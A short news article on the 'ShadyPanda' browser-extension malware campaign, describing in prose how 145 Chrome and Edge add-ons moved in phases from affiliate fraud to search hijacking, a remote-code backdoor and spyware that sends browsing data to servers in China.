A years-long malware campaign dubbed “ShadyPanda” has compromised more than 4.3 million Chrome and Edge browsers through extensions that initially appeared to be legitimate tools. The operation, detailed by researchers at Koi Security, run in four phases that gradually transformed benign add-ons into powerful spyware.
Koi reports that 145 extensions (20 for Chrome and 125 for Microsoft Edge) have been linked to the campaign since its origins in 2018. While Google has removed the malicious Chrome extensions from its Web Store, the operation remains active on the Microsoft Edge Add-ons platform, where one extension still lists 3 million installs.
ShadyPanda’s first malicious activity surfaced in 2023, when several wallpaper and productivity extensions began engaging in affiliate fraud. By injecting tracking codes for major sites including eBay, Booking.com, and Amazon, the operators secretly monetized users’ purchases.
The campaign expanded in early 2024 with an extension called Infinity V+, which began hijacking search queries. According to Koi, the add-on redirected searches to a rogue engine, exfiltrated cookies, and transmitted captured queries to attacker-controlled domains.
In the next phase, five previously trusted extensions received updates that introduced a hidden backdoor. Each infected browser began running a remote code execution framework that checked an attacker server every hour for new commands, fetched arbitrary JavaScript, and executed it with full browser privileges. The extensions also exfiltrated browsing history, device fingerprints, and persistent identifiers using encrypted channels.
The final phase, still active today, involves five Edge extensions released in 2023 under the publisher name Starlab Technology. The add-ons have amassed roughly 4 million installs and, according to researchers, contain an embedded spyware module that collects browsing data and sends it to 17 servers located in China.